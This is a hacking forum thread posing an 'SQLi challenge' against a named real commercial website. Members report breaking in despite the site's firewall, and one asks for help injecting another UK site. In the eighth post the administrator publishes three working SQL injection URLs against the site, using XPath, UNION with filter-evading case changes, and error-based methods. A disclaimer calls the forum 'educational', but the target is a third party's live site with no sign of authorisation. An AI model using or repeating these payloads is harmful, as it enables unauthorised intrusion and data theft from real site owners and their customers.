Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


SQLi Challenge

  • 0 Vote(s) - 0 Average


11-29-2013, 03:58 PM #1
madcodE Offline Administrator **********
Junior Administrator
Posts:501 Threads:99 Joined:Oct 2012 Reputation: 8
Mood: Devilish
!!!!!! SQL CHALLENGE !!!!!!
Today A guy gave me link that he could not Inject, So me and Mak Man we trying to inject that site..but Website has a decent firewall.. ....but then we found another way but lets see how many of you can bypass it You can do whatever you want (But Not Photoshop LOL) No Restrictions , Just print the db version with your name site url is


http://www.expressgiftservice.com/


here is our proof
[Image: 1470391_606243079413668_1897498373_n.jpg]

Dont Post Your Solution here.. Just PM me your Syntax

solvers so far:
ajkaro
Alpha_attack
Juxrummy

11-29-2013, 05:42 PM #2
maskhush Offline Respected *****
Respected
Posts:262 Threads:27 Joined:Oct 2013 Reputation: 0
Mood: None
madcode i have one uk sql website i inject some data from their but now its not inject with havij or any other tools so can u help me brother ?

[Image: dhnw2oE.png]

12-05-2013, 10:01 AM #3
ajkaro Offline Junior Member **
Registered
Posts:6 Threads:0 Joined:Oct 2013 Reputation: 0
Mood: None
[Image: b288519439284bf2e865988a3da9c5f3.jpg]

Thanks for the challenge

12-06-2013, 01:40 AM #4
Alpha_Attack Offline Mess with the best die like the rest *****
Respected
Posts:88 Threads:2 Joined:Nov 2013 Reputation: 0
Mood: None
Tricky SQLi but not impossible

[Image: 70e268111b336e2d819d142d2acbc553.png]

[Image: zlrxag.jpg]
[Image: 8Ox]

12-06-2013, 04:40 PM #5
Net_Spy Offline Respected *****
Respected
Posts:47 Threads:20 Joined:Nov 2012 Reputation: 1
Mood: None
ajkaro just enable your PM .

Regards
Net_Spy

12-08-2013, 06:55 AM #6
Net_Spy Offline Respected *****
Respected
Posts:47 Threads:20 Joined:Nov 2012 Reputation: 1
Mood: None
I'm too lazy to inject it , it is error based have fun guys.

Regards
Net_Spy

12-09-2013, 05:50 AM #7
juxrummy Offline Junior Member **
Registered
Posts:34 Threads:5 Joined:Jul 2013 Reputation: 0
Mood: None
MadCode Bro i did it in two ways..
both queries sent to you.. trying to do this in the way as Ajkaro Did.. Smiley1
[Image: image.jpg]


+++++++++++
ALLAH ix Great
+++++++++++

Love for H4X0rL1f3
by rummykhan

12-12-2013, 03:47 AM #8
madcodE Offline Administrator **********
Junior Administrator
Posts:501 Threads:99 Joined:Oct 2012 Reputation: 8
Mood: Devilish
okay here is solution Biggrinsmiley

1st solution using xpath injection
http://www.expressgiftservice.com/search...tegories=1 and extractvalue(0x0a,concat(0x0a,version()))--

2nd solution Union Based

http://www.expressgiftservice.com/search...tegories=1 and 0 Union %53eleCt concat(0x3c666f6e7420636f6c6f723d22677265656e223e3c62723e6d6164636f644520616e64206d616b6d616e3c62723e76657273696f6e20696e666f3a3a,version())--

3rd solution Error Based

http://www.expressgiftservice.com/search...tegories=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

09-27-2014, 09:06 PM #9
jibon57 Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:19 Threads:4 Joined:Aug 2014 Reputation: 0
Mood: None
Hey madcodE,
Thanks for the solution. But how did you bypass the firewall ? I tried but it's removing () Sadsmiley

09-28-2014, 08:19 PM #10
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:790 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
it looks like a new filter Smiley1

[Image: xodhvlpa.jpg]
[Image: test.php]






Forum Jump:


Users browsing this thread:1 Guest(s)